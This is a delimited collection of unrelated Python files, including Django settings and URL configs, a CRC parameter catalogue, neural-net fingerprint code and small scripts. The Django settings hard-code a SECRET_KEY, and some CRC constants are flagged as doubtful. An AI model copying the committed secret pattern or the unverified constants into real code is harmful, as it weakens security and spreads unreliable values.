# Prompt for the target platform; only "win64" is currently implemented.
option = input("Build options: win32, win64, osx, linux, linux64, enter your option: \n")
buildpath = ""
if option == "win64":
    option = "-buildWindows64Player"
    buildpath = "WIN_Build\\KaziJump.exe"
# NOTE(review): options other than "win64" fall through with an empty flag
# and output path - confirm whether the remaining platforms should be added.
# Bug fix: the original concatenated the flag and the output path with no
# separating space, producing "-buildWindows64Playerbuilds\\...".
os.popen("\"C:\\Program Files\\Unity 5.6.0b3\\Editor\\Unity.exe\" -batchmode "
         + option + " builds\\" + buildpath)
|
"""
Small demonstration module: a doctested addition helper.
"""
def add(a, b):
    """Return the sum of ``a`` and ``b``.

    >>> add(2, 2)
    4
    >>> add(2, -2)
    0
    """
    total = a + b
    return total
if __name__ == "__main__":
    # Quick manual demonstration when executed directly.
    a = 5
    b = 6
    print(f"The sum of {a} + {b} is {add(a, b)}")
|
""" Program version information.
"""
import sys
# Set to True to enable extra debugging output.
DEBUGGING = False
PROGRAM_NAME = 'astviewer'
PROGRAM_VERSION = '1.1.2'
# Interpreter version as "major.minor.micro"; version_info[0:3] is a tuple,
# so %-formatting consumes its three elements directly.
PYTHON_VERSION = "%d.%d.%d" % (sys.version_info[0:3])
|
from helpers import cache
@cache
def powers(n):
    """Return the set of distinct values a**b for 2 <= a, b <= n.

    A set comprehension replaces the original nested append loop; duplicates
    (e.g. 2**4 == 4**2) collapse automatically.
    """
    return {a ** b for a in range(2, n + 1) for b in range(2, n + 1)}
n = 100
# Parenthesized print is valid under both Python 2 and 3 for a single value
# (the original bare print statement is Python-2-only syntax).
print(len(powers(n)))
|
from sqlalchemy.orm.exc import NoResultFound
import io
import sys
sys.path.append("models/")
from ModelBase import SessionFactory
from Twitter_User import Twitter_User
from sqlalchemy import or_
import logging
class setTargetUsers(object):
    """Flag the Twitter_User rows listed in a uid file as targets.

    All users are first un-flagged in batches, then every uid present in
    the input file is re-flagged.
    """

    def parseparams(self, argv):
        # Minimal CLI parsing: only -f <userids file> is honoured here.
        pc = 0
        while pc < len(argv):
            param = argv[pc]
            if param == '-f':
                pc += 1
                self.filename = argv[pc]
            pc += 1

    def usage(self, argv):
        # Parenthesized print works on both Python 2 and 3 (the original
        # bare print statement was Python-2-only).
        print("USAGE: python %s -f <userids file> -b <authenticated bot alias> -s [Optional] <starting with user id>" % (argv[0]))

    def __init__(self, argv):
        self.parseparams(argv)

    def run(self, batchSize=1000):
        session = SessionFactory()
        count = 0
        print("running process")
        # first set all istargets to false
        for user in session.query(Twitter_User).filter(or_(
                Twitter_User.istarget, Twitter_User.istarget == None)):
            user.istarget = False
            count += 1
            if (count % batchSize) == 0:
                print("commit 1")
                session.commit()
        toChange = set([line.strip()
                        for line in io.open(self.filename).readlines()])
        for id in toChange:
            try:
                user = session.query(Twitter_User).filter(
                    Twitter_User.uid == id).one()
            except NoResultFound:
                logging.info('user id not found:%s' % id)
                # Bug fix: the original fell through and re-flagged the
                # previous user (or raised NameError on the first miss);
                # skip missing uids instead.
                continue
            user.istarget = True
        session.commit()
        print("help")
# Script entry point: parse argv and apply the target flags.
setTargetUsers(sys.argv).run()
|
"""
Local Authorities downloader class
"""
import logging
import os
import re
import requests
from ..caches.s3_cache import S3Cache
from ..caches.filesystem_cache import FilesystemCache
from ..caches.multi_level_caching_strategy import MultiLevelCachingStrategy
from ..downloaders.download_manager import DownloadManager
from .http import HttpDownloader
log = logging.getLogger(__name__)
class LocalAuthoritiesDownloader():
    """Download the latest UK local-authority names/codes file from the
    ONS geoportal, with filesystem + S3 caching."""

    def __init__(self, *args, **kwargs):
        self.dest_dir = kwargs.pop('destination_dir', '/tmp/local_authorities')
        self.cache_key = 'local-authorities-names-to-codes'

    def _index_url(self):
        # Overridable via the environment (testing / mirrors).
        return os.environ.get('LOCAL_AUTHORITIES_INDEX_URL',
                              ("http://geoportal.statistics.gov.uk/geoportal/"
                               "rest/find/document?searchText="
                               "Local%20Authority%20Districts%20UK&f=pjson"))

    def _get_latest_file_url(self):
        """Return the download-link dict of the newest matching record."""
        index = requests.get(self._index_url()).json()
        # List comprehensions instead of bare filter(): on Python 3,
        # filter() returns a non-indexable iterator.
        la_records = [r for r in index['records']
                      if self._is_uk_local_authorities_list(r)]
        newest_record = sorted(
            la_records, key=self._year_from_title, reverse=True)[0]
        return [link for link in newest_record['links']
                if self._is_file_link(link)][0]

    def _is_file_link(self, link):
        # 'open' links are direct file downloads in the geoportal schema.
        return link['type'] == 'open'

    def _is_uk_local_authorities_list(self, record):
        title = record['title'].lower()
        pattern = r'local authority districts \(uk\) .* names and codes'
        return re.search(pattern, title)

    def _year_from_title(self, record):
        """Extract the year from a record title as an int sort key.

        Bug fix: the original used re.sub with '\\1' in a non-raw string
        (a literal \\x01 byte, not a back-reference) and a greedy
        '.*([0-9]+)' that captured only the last digit, so records never
        actually sorted by year.
        """
        match = re.search(r'([0-9]+)', record['title'])
        return int(match.group(1)) if match else 0

    def download(self, dest_dir):
        url = self._get_latest_file_url()['href']
        dl_mgr = DownloadManager(
            destination_dir=dest_dir,
            downloader=HttpDownloader(url),
            caching_strategy=self._caching_strategy())
        return dl_mgr.download(url=url)

    def _caching_strategy(self):
        caches = [
            # Use the configured directory (the original hard-coded
            # '/tmp/local_authorities', ignoring destination_dir).
            FilesystemCache(dir=self.dest_dir),
            S3Cache()
        ]
        return MultiLevelCachingStrategy(caches=caches)
|
"""
Library of common CRC configurations
:note: POLY is the polynomial of the CRC and specifies which bits
    should be XORed together.
:note: WIDTH - specifies the width of the CRC state/value in bits
:note: REFIN - if True, the bits in each input byte are reversed before processing.
:note: REFOUT - if False, the
    final value in the register is fed into the XOROUT stage directly;
    if True, the final register value is
    reflected first.
:note: XOROUT - a WIDTH-bit value. It is XORed with the final register value
    (after the REFOUT stage) before the value is returned as the official
    checksum.
:note: http://reveng.sourceforge.net/crc-catalogue/all.htm
:note: https://github.com/nanpuyue/crc/blob/master/CRC.txt
"""
class CRC_POLY:
    """
    Base class for crc configuration specifications
    """
    # Defaults; subclasses override the relevant subset.
    POLY = None     # generator polynomial (bits XORed together)
    WIDTH = None    # CRC register width in bits
    INIT = 0        # initial register value
    REFIN = False   # reflect input bytes before processing
    REFOUT = False  # reflect final register value
    XOROUT = 0      # value XORed onto the final register value
# --- 1- to 5-bit CRC configurations ----------------------------------------
class CRC_1(CRC_POLY):
    """
    also known as parity bit
    """
    POLY = 0x1
    WIDTH = 1
class CRC_3_GSM(CRC_POLY):
    """
    Used in mobile networks
    """
    INIT = 0x0
    POLY = 0x3
    XOROUT = 0x07
    WIDTH = 3
# NOTE(review): CRC3_ROHC breaks the CRC_<width>_<name> naming convention
# used elsewhere (CRC3 vs CRC_3); renaming would break importers.
class CRC3_ROHC(CRC_POLY):
    "CRC-3/ROHC (Robust header compression rfc3095)"
    WIDTH = 3
    POLY = 0x03
    INIT = 0x07
    REFIN = True
    REFOUT = True
    CHECK = 0x6
    RESIDUE = 0x0
class CRC_4_ITU(CRC_POLY):
    """
    G.704
    """
    POLY = 0x3
    WIDTH = 4
    REFIN = True
    REFOUT = True
    CHECK = 0x7
    RESIDUE = 0x0
class CRC_5_EPC(CRC_POLY):
    """
    Gen 2 RFID EPC-C1G2
    """
    # NOTE(review): the reveng catalogue lists INIT=0x09 for CRC-5/EPC; here
    # INIT is inherited as 0 - verify before relying on CHECK/RESIDUE.
    POLY = 0x09
    WIDTH = 5
    CHECK = 0x00
    RESIDUE = 0x00
class CRC_5_ITU(CRC_POLY):
    """
    G.704
    """
    POLY = 0x15
    WIDTH = 5
class CRC_5_USB(CRC_POLY):
    """
    USB token packets
    """
    CHECK = 0x19
    INIT = 0b11111
    REFIN = True
    REFOUT = True
    RESIDUE = 0b01100
    POLY = 0x05
    WIDTH = 5
    XOROUT = 0x1f
# --- 6- to 8-bit CRC configurations ----------------------------------------
class CRC_6_CDMA2000_A(CRC_POLY):
    "Used in mobile networks"
    POLY = 0x27
    WIDTH = 6
class CRC_6_CDMA2000_B(CRC_POLY):
    "Used in mobile networks"
    POLY = 0x07
    WIDTH = 6
class CRC_6_DARC(CRC_POLY):
    "Data Radio Channel"
    POLY = 0x19
    WIDTH = 6
class CRC_6_GSM(CRC_POLY):
    "Used in mobile networks"
    POLY = 0x2F
    WIDTH = 6
class CRC_6_ITU(CRC_POLY):
    "Used in G.704"
    POLY = 0x03
    WIDTH = 6
class CRC_7(CRC_POLY):
    "Used in telecom systems, G.707,G.832, MMC, SD"
    POLY = 0x09
    WIDTH = 7
class CRC_7_MVB(CRC_POLY):
    "Used in Train Communication Network, IEC 60870-5"
    POLY = 0x65
    WIDTH = 7
class CRC_8(CRC_POLY):
    "Used in DVB-S2"
    POLY = 0xD5
    WIDTH = 8
class CRC_8_AUTOSAR(CRC_POLY):
    "Used in automotive integration, OpenSafety"
    POLY = 0x2F
    WIDTH = 8
class CRC_8_Bluetooth(CRC_POLY):
    "Used in wireless connectivity"
    POLY = 0xA7
    WIDTH = 8
class CRC_8_CCITT(CRC_POLY):
    "Used in I.432.1; ATM HEC, ISDN HEC and cell delineation"
    CHECK = 0xf4
    POLY = 0x07
    WIDTH = 8
    RESIDUE = 0x00
class CRC_8_Dallas_Maxim(CRC_POLY):
    "Used in 1-Wire bus"
    POLY = 0x31
    WIDTH = 8
class CRC_8_DARC(CRC_POLY):
    "Used in Data Radio Channel"
    POLY = 0x39
    WIDTH = 8
class CRC_8_GSM_B(CRC_POLY):
    "Used in mobile networks"
    POLY = 0x49
    WIDTH = 8
class CRC_8_SAE_J1850(CRC_POLY):
    "Used in AES3"
    POLY = 0x1D
    WIDTH = 8
class CRC_8_WCDMA(CRC_POLY):
    "Used in mobile networks"
    CHECK = 0x25
    INIT = 0X00
    POLY = 0x9B
    REFIN = True
    REFOUT = True
    RESIDUE = 0x00
    WIDTH = 8
# --- 10- to 16-bit CRC configurations --------------------------------------
class CRC_10(CRC_POLY):
    "Used in ATM; I.610"
    POLY = 0x233
    WIDTH = 10
class CRC_10_CDMA2000(CRC_POLY):
    "Used in mobile networks"
    POLY = 0x3D9
    WIDTH = 10
class CRC_10_GSM(CRC_POLY):
    "Used in mobile networks"
    POLY = 0x175
    WIDTH = 10
class CRC_11(CRC_POLY):
    "Used in FlexRay"
    POLY = 0x385
    WIDTH = 11
class CRC_12(CRC_POLY):
    "Used in telecom systems"
    POLY = 0x80F
    WIDTH = 12
class CRC_12_CDMA2000(CRC_POLY):
    "Used in mobile networks"
    POLY = 0xF13
    WIDTH = 12
class CRC_12_GSM(CRC_POLY):
    "Used in mobile networks"
    POLY = 0xD31
    WIDTH = 12
class CRC_13_BBC(CRC_POLY):
    "Used in Time signal, Radio teleswitch"
    POLY = 0x1CF5
    WIDTH = 13
class CRC_14_DARC(CRC_POLY):
    "Used in Data Radio Channel[19]"
    POLY = 0x0805
    WIDTH = 14
class CRC_14_GSM(CRC_POLY):
    "Used in mobile networks"
    POLY = 0x202D
    WIDTH = 14
class CRC_15_CAN(CRC_POLY):
    # Used in the CAN bus frame check sequence.
    POLY = 0x4599
    WIDTH = 15
class CRC_15_MPT1327(CRC_POLY):
    POLY = 0x6815
    WIDTH = 15
class CRC_16_Chakravarty(CRC_POLY):
    "Used in Optimal for payloads ≤64 bits"
    POLY = 0x2F15
    WIDTH = 16
class CRC_16_ARINC(CRC_POLY):
    "Used in ACARS applications"
    POLY = 0xA02B
    WIDTH = 16
class CRC_16_CCITT(CRC_POLY):
    """
    Used in X.25, V.41, HDLC FCS, XMODEM, Bluetooth, PACTOR, SD, DigRF, many others;
    Also known as CRC_CCITT
    """
    INIT = 0xFFFF
    POLY = 0x1021
    WIDTH = 16
class CRC_16_CDMA2000(CRC_POLY):
    "Used in mobile networks"
    POLY = 0xC867
    WIDTH = 16
class CRC_16_DECT(CRC_POLY):
    "Used in cordless telephones"
    POLY = 0x0589
    WIDTH = 16
class CRC_16_T10_DIF(CRC_POLY):
    "Used in SCSI DIF"
    POLY = 0x8BB7
    WIDTH = 16
class CRC_16_DNP(CRC_POLY):
    "Used in DNP, IEC 870, M-Bus"
    POLY = 0x3D65
    WIDTH = 16
class CRC_16_IBM(CRC_POLY):
    """
    Used in Bisync, Modbus, ANSI X3.28, SIA DC-07, many others;
    Also known as CRC_16 and CRC_16-ANSI
    """
    POLY = 0x8005
    REFIN = True
    REFOUT = True
    WIDTH = 16
class CRC_16_USB(CRC_POLY):
    """Used in USB data packets.

    Consistency fix: this was the only configuration in the catalogue not
    inheriting CRC_POLY; hex-literal case normalized (values unchanged).
    """
    POLY = 0x8005
    INIT = 0xFFFF
    REFIN = True
    REFOUT = True
    XOROUT = 0xFFFF
    CHECK = 0xB4C8
    RESIDUE = 0xB001
    WIDTH = 16
# --- 16-bit fieldbus variants and wider CRCs -------------------------------
class CRC_16_OpenSafety_A(CRC_POLY):
    "Used in safety fieldbus"
    POLY = 0x5935
    WIDTH = 16
class CRC_16_OpenSafety_B(CRC_POLY):
    "Used in safety fieldbus"
    POLY = 0x755B
    WIDTH = 16
class CRC_16_Profibus(CRC_POLY):
    "Used in fieldbus networks"
    POLY = 0x1DCF
    WIDTH = 16
class CRC_17_CAN(CRC_POLY):
    "Used in CAN FD"
    POLY = 0x1685B
    WIDTH = 17
class CRC_21_CAN(CRC_POLY):
    "Used in CAN FD"
    POLY = 0x102899
    WIDTH = 21
class CRC_24(CRC_POLY):
    "Used in FlexRay"
    POLY = 0x5D6DCB
    WIDTH = 24
class CRC_24_Radix_64(CRC_POLY):
    "Used in OpenPGP, RTCM104v3"
    POLY = 0x864CFB
    WIDTH = 24
class CRC_30(CRC_POLY):
    "Used in CDMA"
    POLY = 0x2030B9C7
    WIDTH = 30
class CRC_32(CRC_POLY):
    """
    Used in HDLC, ANSI X3.66, ITU-T V.42, Ethernet, Serial ATA,
    MPEG-2, PKZIP, Gzip, Bzip2, PNG, many others
    """
    INIT = 0xffffffff
    POLY = 0x04C11DB7
    RESIDUE = 0xC704DD7B # CBF43926
    REFIN = True
    REFOUT = True
    WIDTH = 32
    XOROUT = 0xffffffff
class CRC_32C(CRC_POLY):
    "Used in (Castagnoli), iSCSI, SCTP, G.hn payload, SSE4.2, Btrfs, ext4, Ceph"
    INIT = 0Xffffffff
    CHECK = 0xe3069283
    POLY = 0x1EDC6F41
    WIDTH = 32
    REFIN = True
    REFOUT = True
    RESIDUE = 0xb798b438
    XOROUT = 0xffffffff
class CRC_32K(CRC_POLY):
    "Koopman {1,3,28}"
    POLY = 0x741B8CD7
    WIDTH = 32
class CRC_32K_2(CRC_POLY):
    "Koopman {1,1,30}"
    POLY = 0x32583499
    WIDTH = 32
class CRC_32Q(CRC_POLY):
    "Used in aviation; AIXM"
    POLY = 0x814141AB
    WIDTH = 32
class CRC_40_GSM(CRC_POLY):
    "Used in GSM control channel[40][41]"
    POLY = 0x0004820009
    WIDTH = 40
class CRC_64_ECMA(CRC_POLY):
    "Used in ECMA-182, XZ Utils"
    POLY = 0x42F0E1EBA9EA3693
    WIDTH = 64
class CRC_64_ISO(CRC_POLY):
    "Used in HDLC, Swiss-Prot/TrEMBL; considered weak for hashing"
    POLY = 0x000000000000001B
    WIDTH = 64
|
import pytest
from flask_postmark import Postmark
# Fixture data shared by all tests below.
BODY = "<html><body><strong>Hello</strong> dear Postmark user.</body></html>"
SUBJECT = "Postmark test"
RECEIVER = "receiver@example.com"
SENDER = "sender@example.com"
# Minimal Postmark send payload built from the pieces above.
DATA = {"From": SENDER, "To": RECEIVER, "Subject": SUBJECT, "HtmlBody": BODY}
def test_token(test_client, server_token):
    # The /token endpoint must echo back the configured server token.
    response = test_client.get("/token")
    assert response.data == server_token
def test_send(post):
    # A single send returns the full Postmark payload with every optional
    # field explicitly empty/None.
    expected = {
        "Attachments": [],
        "Bcc": None,
        "Cc": None,
        "From": SENDER,
        "Headers": [],
        "HtmlBody": BODY,
        "Metadata": None,
        "Tag": None,
        "TextBody": None,
        "To": RECEIVER,
        "TrackLinks": "None",
        "TrackOpens": None,
        "ReplyTo": None,
        "Subject": SUBJECT,
    }
    assert post("/send", DATA) == expected
def test_send_batch(post):
    # Batch send returns one payload per submitted message.
    expected = {
        "Attachments": [],
        "From": SENDER,
        "Headers": [],
        "Subject": SUBJECT,
        "HtmlBody": BODY,
        "To": RECEIVER,
    }
    batch = post("/send_batch", [DATA, DATA])
    assert batch == [expected, expected]
def test_is_same_client(post):
    # Repeated access within one request must reuse the same client object.
    result = post("/is_same_client", DATA)
    assert result is True
def test_empty_app(app):
    # init_app() on a bare extension registers exactly one extra teardown hook.
    hooks_before = len(app.teardown_appcontext_funcs)
    assert hooks_before == 1
    extension = Postmark()
    extension.init_app(app)
    assert len(app.teardown_appcontext_funcs) == hooks_before + 1
def test_get_app(app):
    # _get_app() resolves to the app the extension was constructed with.
    extension = Postmark(app)
    assert extension._get_app() is app
def test_no_context(app):
    # Accessing the client outside of an app context must raise.
    extension = Postmark(app)
    with pytest.raises(RuntimeError):
        extension.client
def test_teardown(app):
    # The teardown hook must not return a response-altering value.
    extension = Postmark(app)
    assert extension.teardown(None) is None
|
from django.conf.urls import patterns, url
from bento.views import connexion, deconnexion, inscription, Recettes, ajoutrecette, modifier, VoirRecette, commenter, \
supprimer, voter
# URL routes for the bento recipe app.
# NOTE(review): patterns() was removed in Django 1.10; this file targets an
# older Django release - confirm before upgrading.
urlpatterns = patterns('',
    url(r'^$', Recettes.as_view(), name='index'),
    url(r'^index$', Recettes.as_view(), name='index'),
    # The numeric variant must stay declared before the generic \w+ one so
    # numeric ids are captured as <type>.
    url(r'^index/(?P<type>\d+)$', Recettes.as_view(), name='index'),
    url(r'^index/(?P<args>\w+)$', Recettes.as_view(), name='index'),
    url(r'^connexion$', connexion, name='connexion'),
    url(r'^deconnexion$', deconnexion, name='deconnexion'),
    url(r'^inscription$', inscription, name='inscription'),
    # NOTE(review): unanchored pattern (no trailing $) - matches any path
    # starting with "ajouter"; confirm this is intended.
    url(r'^ajouter', ajoutrecette, name='ajouter'),
    url(r'^recette/(?P<slug>[\w-]+)$', VoirRecette.as_view(), name='recette'),
    url(r'^modifier/(?P<slug>[\w-]+)$', modifier, name='modifier'),
    url(r'^voter/(?P<slug>[\w-]+)$', voter, name='voter'),
    url(r'^commenter/(?P<slug>[\w-]+)$', commenter, name='commenter'),
    url(r'^supprimer/(?P<slug>[\w-]+)$', supprimer, name='supprimer'),
)
|
"""
Django settings for impulse project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Project root (two levels above this settings file).
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# NOTE(review): secret key committed to source control - move it to an
# environment variable before any production deployment.
SECRET_KEY = '8cfd0kv_khr)*8agw0heyh$45u)st54emhy8+49qcqc9&%ib3u'
ALLOWED_HOSTS = []
INSTALLED_APPS = [
    'impulse.alert',
    'impulse.event',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django_twilio',
    'phonenumber_field',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'impulse.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'impulse.wsgi.application'
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
# Store numbers in E.164 format.
PHONENUMBER_DB_FORMAT = 'E164'
# NOTE(review): PHONENUMBER_DEFAULT_REGION expects an ISO 3166-1 alpha-2
# country code (e.g. 'US'); 'E164' is a format name, not a region - confirm.
PHONENUMBER_DEFAULT_REGION = 'E164'
|
import autograd.numpy as np
from util import memoize, WeightsParser
from rdkit_utils import smiles_to_fps
def batch_normalize(activations):
    """Center and scale each column by its minibatch statistics.

    A constant 1 is added to the standard deviation as a smoothing term.
    """
    centered = activations - np.mean(activations, axis=0, keepdims=True)
    scale = np.std(activations, axis=0, keepdims=True) + 1
    return centered / scale
def relu(X):
    """Rectified linear activation: zero out negative entries."""
    positive_mask = X > 0
    return X * positive_mask
def sigmoid(x):
    """Logistic sigmoid expressed via tanh (autograd-friendly form)."""
    return (np.tanh(x) + 1) / 2
def mean_squared_error(predictions, targets):
    """Per-output mean squared error, averaged over the batch axis."""
    errors = predictions - targets
    return np.mean(errors * errors, axis=0)
def categorical_nll(predictions, targets):
    """Negative mean of the elementwise prediction-target product."""
    return -(predictions * targets).mean()
def binary_classification_nll(predictions, targets):
    """Predictions is a real number, whose sigmoid is the probability that
    the target is 1."""
    probs = sigmoid(predictions)
    # Probability assigned to the observed label: probs where target == 1,
    # (1 - probs) where target == 0.
    matched = probs * targets + (1 - probs) * (1 - targets)
    return -np.mean(np.log(matched))
def build_standard_net(layer_sizes, normalize, L2_reg, L1_reg=0.0, activation_function=relu,
                       nll_func=mean_squared_error):
    """Just a plain old neural net, nothing to do with molecules.
    layer sizes includes the input size.

    Returns (loss, predictions, parser): the regularized loss function, the
    forward-pass function, and the WeightsParser describing the flat weight
    vector layout.
    """
    # Append a single scalar output unit.
    layer_sizes = layer_sizes + [1]
    parser = WeightsParser()
    for i, shape in enumerate(zip(layer_sizes[:-1], layer_sizes[1:])):
        parser.add_weights(('weights', i), shape)
        parser.add_weights(('biases', i), (1, shape[1]))
    def predictions(W_vect, X):
        # Forward pass; normalization/activation are skipped on the output layer.
        cur_units = X
        for layer in range(len(layer_sizes) - 1):
            cur_W = parser.get(W_vect, ('weights', layer))
            cur_B = parser.get(W_vect, ('biases', layer))
            cur_units = np.dot(cur_units, cur_W) + cur_B
            if layer < len(layer_sizes) - 2:
                if normalize:
                    cur_units = batch_normalize(cur_units)
                cur_units = activation_function(cur_units)
        return cur_units[:, 0]
    def loss(w, X, targets):
        assert len(w) > 0
        # L2 (Gaussian) and L1 (Laplace) weight priors act as regularizers.
        log_prior = -L2_reg * np.dot(w, w) / len(w) - L1_reg * np.mean(np.abs(w))
        preds = predictions(w, X)
        return nll_func(preds, targets) - log_prior
    return loss, predictions, parser
def build_fingerprint_deep_net(net_params, fingerprint_func, fp_parser, fp_l2_penalty):
    """Composes a fingerprint function with signature (smiles, weights, params)
    with a fully-connected neural network.

    Returns (loss_fun, pred_fun, combined_parser); the combined parser holds
    both the fingerprint weights and the net weights in one flat vector.
    """
    net_loss_fun, net_pred_fun, net_parser = build_standard_net(**net_params)
    combined_parser = WeightsParser()
    combined_parser.add_weights('fingerprint weights', (len(fp_parser),))
    combined_parser.add_weights('net weights', (len(net_parser),))
    def unpack_weights(weights):
        # Split the flat combined vector back into its two segments.
        fingerprint_weights = combined_parser.get(weights, 'fingerprint weights')
        net_weights = combined_parser.get(weights, 'net weights')
        return fingerprint_weights, net_weights
    def loss_fun(weights, smiles, targets):
        fingerprint_weights, net_weights = unpack_weights(weights)
        fingerprints = fingerprint_func(fingerprint_weights, smiles)
        net_loss = net_loss_fun(net_weights, fingerprints, targets)
        # Optional L2 penalty on the fingerprint weights only (the net has
        # its own regularization inside net_loss_fun).
        if len(fingerprint_weights) > 0 and fp_l2_penalty > 0:
            return net_loss + fp_l2_penalty * np.mean(fingerprint_weights**2)
        else:
            return net_loss
    def pred_fun(weights, smiles):
        fingerprint_weights, net_weights = unpack_weights(weights)
        fingerprints = fingerprint_func(fingerprint_weights, smiles)
        return net_pred_fun(net_weights, fingerprints)
    return loss_fun, pred_fun, combined_parser
def build_morgan_fingerprint_fun(fp_length=512, fp_radius=4):
    """Return a (weights, smiles) -> fingerprints function computing fixed
    Morgan fingerprints; the weights argument is accepted but unused."""
    def fingerprints_from_smiles(weights, smiles):
        # Morgan fingerprints don't use weights.
        return fingerprints_from_smiles_tuple(tuple(smiles))
    @memoize # This wrapper function exists because tuples can be hashed, but arrays can't.
    def fingerprints_from_smiles_tuple(smiles_tuple):
        return smiles_to_fps(smiles_tuple, fp_length, fp_radius)
    return fingerprints_from_smiles
def build_morgan_deep_net(fp_length, fp_depth, net_params):
    """Fully-connected net on top of fixed (non-learned) Morgan fingerprints."""
    fingerprint_fun = build_morgan_fingerprint_fun(fp_length, fp_depth)
    # Morgan fingerprints have no learnable weights, hence the empty parser
    # and a zero fingerprint L2 penalty.
    return build_fingerprint_deep_net(net_params, fingerprint_fun, WeightsParser(), 0)
def build_mean_predictor(loss_func):
    """Baseline model that predicts one learned scalar for every input."""
    parser = WeightsParser()
    parser.add_weights('mean', (1,))

    def loss_fun(weights, smiles, targets):
        # Broadcast the learned mean to the target shape before scoring.
        mean = parser.get(weights, 'mean')
        return loss_func(np.full(targets.shape, mean), targets)

    def pred_fun(weights, smiles):
        mean = parser.get(weights, 'mean')
        return np.full((len(smiles),), mean)

    return loss_fun, pred_fun, parser
|
class person:
    """Player character: 3 hit points, attack power 1."""
    atk = 1
    hp = 3
class goblin:
    """Weak enemy: 2 hit points, attack power 1."""
    atk = 1
    hp = 2
class dragon:
    """Boss enemy: 10 hit points, attack power 3."""
    atk = 3
    hp = 10
|
"""melodi URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.auth.views import logout, login
from django.views.generic import TemplateView
from django.contrib.auth import views as auth_views
from django.core.urlresolvers import reverse_lazy
from browser.views import *
from rest_framework import routers
# REST framework router exposing the SearchSet API under /api/searchset.
router = routers.DefaultRouter()
# NOTE(review): `base_name` was renamed `basename` in DRF 3.9+ — confirm the
# installed DRF version before upgrading.
router.register(r'searchset', SearchSetViewSet, base_name="SearchSet")
urlpatterns = [
    # REST API and the browsable-API login/logout views.
    url(r'^api/', include(router.urls)),
    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
    #url(r'^browser/', include('browser.urls')),
    url(r'^admin/', include(admin.site.urls)),
    # python-social-auth routes are mounted with no prefix.
    url(r'', include('social_auth.urls')),
    # NOTE(review): the static pages below have no trailing '$' anchor, so
    # e.g. '^about' also matches '/aboutanything' — confirm this is intended.
    url(r'^about', about, name='about'),
    url(r'^citation', citation, name='citation'),
    # NOTE(review): the `help` view imported via `from browser.views import *`
    # shadows the `help` builtin in this module.
    url(r'^help', help, name='help'),
    url(r'^contact', contact, name='contact'),
    # Session auth; logout redirects back to the home page.
    url(r'^logout/', logout, {'next_page': reverse_lazy('home')}, name='logout'),
    url(r'^login/', login, name='login'),
    #url(r'^login-error/$', TemplateView.as_view(template_name="login-error.html")),
    url(r'^$', index, name='home'),
    url(r'^jobs/', jobs, name='jobs'),
    url(r'^results/(?P<num>[0-9a-z-]+)/$', results, name='results'),
    # Social-auth completion and error handlers.
    url(r'^complete/(?P<backend>[^/]+)/$', AuthComplete.as_view()),
    url(r'^login-error/$', LoginError.as_view()),
    url(r'^database/$', OrderListJson.as_view(), name='order_list_json'),
    url(r'^pubs/(?P<num>[0-9]+_[0-9])/$',pubDetails, name='pubs'),
    url(r'^pubss/(?P<num>.*_[0-9]+_[0-9])/$',pubSingle, name='pubss'),
    # AJAX endpoints used by the browser UI.
    url(r'^ajax_searchset/$', ajax_searchset.as_view(), name='ajax_searchset'),
    url(r'^ajax_compare/$', ajax_compare.as_view(), name='ajax_compare'),
    url(r'^get_semmed_items/',get_semmed_items, name='get_semmed_items'),
    url(r'^articles/(?P<num>[0-9]+)/$',articleDetails, name='articles'),
    url(r'^ajax_overlap/$', ajax_overlap.as_view(), name='ajax_overlap'),
    url(r'^dt_test_page/$', dt_test_page, name='dt_test_page'),
    url(r'^ajax_graph_metrics/$', ajax_graph_metrics, name='ajax_graph_metrics'),
    url(r'^ajax_share/$', ajax_share, name='ajax_share'),
    url(r'^ajax_delete/$', ajax_delete, name='ajax_delete'),
    # Result downloads and filter import/export.
    url(r'^download_result/$', download_result, name='download_result'),
    url(r'^download_filter/$', download_filter, name='download_filter'),
    url(r'^upload_filter/$', upload_filter, name='upload_filter'),
    url(r'^save_filter/$', save_filter, name='save_filter'),
    url(r'^temmpo/$', temmpo, name='temmpo'),
    url(r'^temmpo_res/$', temmpo_res, name='temmpo_res')
]
|
from src.CommentReflow import GreatestCommonPrefix
class TestBasic:
    """Prefix extraction with the default (unrestricted) configuration."""
